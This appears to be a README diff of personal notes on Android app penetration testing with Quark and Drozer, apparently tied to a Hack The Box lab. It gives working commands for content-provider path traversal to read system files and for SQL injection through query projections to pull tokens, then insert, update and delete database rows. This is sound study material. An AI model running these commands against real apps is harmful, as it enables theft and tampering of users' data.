Naresh76191/Android-Penetration-Testing-Automation/README.md

  7.   chmod -R u+rX /home/kali/Desktop/quark-rules (if needed for permission)
  8.   quark -s -a myapp.apk -r  /home/kali/Desktop/quark-rules/rules -t 100 -w report.html
  9.   quark -s -a myapp.apk -r  /home/kali/Desktop/quark-rules/rules -t 100 -w /home/kali/Desktop/report2
+________________________________________________________________________________________________________________________________________________

+**Drozer**
+Drozer is a security testing framework that allows you to operate as if you're another Android application, enabling direct interaction with other apps, the operating system, and the device itself.
+This perspective closely mimics how a real, installed app would behave on the system, making it ideal for identifying inter-app communication vulnerabilities and misconfigurations.
+(detective app for Android that pretends to be another app so it can check how that app and the phone behave) (Drozer = a hired tester who dresses up as a normal app and walks around the phone asking, “Hey, can I use this?”
+If things answer “yes” when they shouldn’t, that’s a vulnerability.)

+**Key Features**
+**Feature**	              **Description**
+Security Testing          : Framework	Drozer offers a robust framework with built-in modules that simulate various attack scenarios.
+App Interaction	        :Enables interaction with Android's Inter-Process Communication (IPC) components such as content providers, broadcast receivers, and services.
+This allows testers to probe and exploit                              exposed components in other apps.
+Command-line Interface	  :Operates via a powerful CLI, ideal for fast testing, automation, and integration into custom penetration testing workflows or scripts.
+Module-based Architecture :Designed with extensibility in mind, Drozer supports writing custom modules in Python, enabling testers to create app-specific or system-specific security checks.

+Commands:
+1. adb devices -l
+2. adb -s 28061JEGR08933 tcpip 5555 -> Tell device to listen on TCP 5555 (while USB plugged in)
+3. adb -s 28061JEGR08933 shell ip -f inet addr show wlan0 -> Get device IP (if you already ran earlier and have 192.168.1.3, skip step 4 — otherwise run)
+4. adb connect <ip>:<port> -> Connect ADB over Wi-Fi
+5. adb -s <ip>:<port> forward tcp:31415 tcp:3141 -> Forward the Drozer port and connect the console
+6. adb -s <ip>:<port> install -r myapp.apk -> Transerfering the apk
+7. pipx install drozer -> install of drozer
+8. on the device ont he drozer
+9. run app.package.list -> list all the packages installed on the device
+10. run app.package.list -f MyNoteBook -> We can also specify the filter MyNoteBook (the name of the app we want to assess) to find only the package name of the app we are interested in.
+11. run app.package.info -a <package name> -> some general information about this app
+12. run app.package.manifest <package name> -> read the manifest file for this application
+13. run app.package.attacksurface <pakage name> -> components of the application are accessible to other apps
+14. run scanner.provider.traversal -a <package name> ->  if there are any content providers vulnerable to Path Traversal attacks.
+15. run app.provider.read <Vuerbale path from path traversal attack content://provide the url>/../../../system/etc/hosts -> use another module read the contents of the file /system/etc/hosts by exploiting the vulnerable content provider. ( ex. run app.provider.read content://com.hackthebox.myapp.fileprovider/../../../system/etc/hosts)
+16. run scanner.provider.finduris -a <package name> -> explore the providers available URIs.
+(URLs accessible to other apps) This module scans the target app for exported Content Providers and tries to discover any accessible URIs (like database paths).
+18. run scanner.provider.injection -a <package name> -> to scan the app for content providers vulnerable to SQL injection Projection and Selection parameters.
+In this context, Projection defines which columns are returned in a query, while Selection corresponds to the WHERE clause used to filter rows
+19. run scanner.provider.sqltables -a <package name> -> module that automatically exploits the identified injection points and tries to enumerate the database tables. run app.provider.query <paste the url with content:URL where sql is vulerbale> -> module to query the default table associated with this URI
+20. jadx-gui myapp.apk -> check for code where the database is initialized (db).
+21. run app.provider.query  --projection "<column1>, <column2>" -> exploit the SQL injection behavior to further read data
+22. run app.provider.query <content://provider_uri> --projection "<column1>, <column2>, (SELECT token FROM Tokens)" -> select token fromm token needs to be changed when we see the db file
+23. run app.provider.insert <content://provider_uri> --int <column1> 2 --string <column2> test ->  insert new entries into the database. number 2 and test
+24. run app.provider.query <content://provider_uri> --projection "<column1>, <column2>" -> to check where new data has been added are not
+25. run app.provider.update <content://provider_uri> --selection "<column1>=?" --selection-args 2 --string <column2> doe -> Update Existing Entries all data changes as per db or data is stored
+26. run app.provider.delete <content://provider_uri> --selection "<column1>=?" --selection-args 2 -> Delete Existing Entry (delete the entry with _id = 2 )
+27.

 _________________________________________________________________________________________________________________________________________________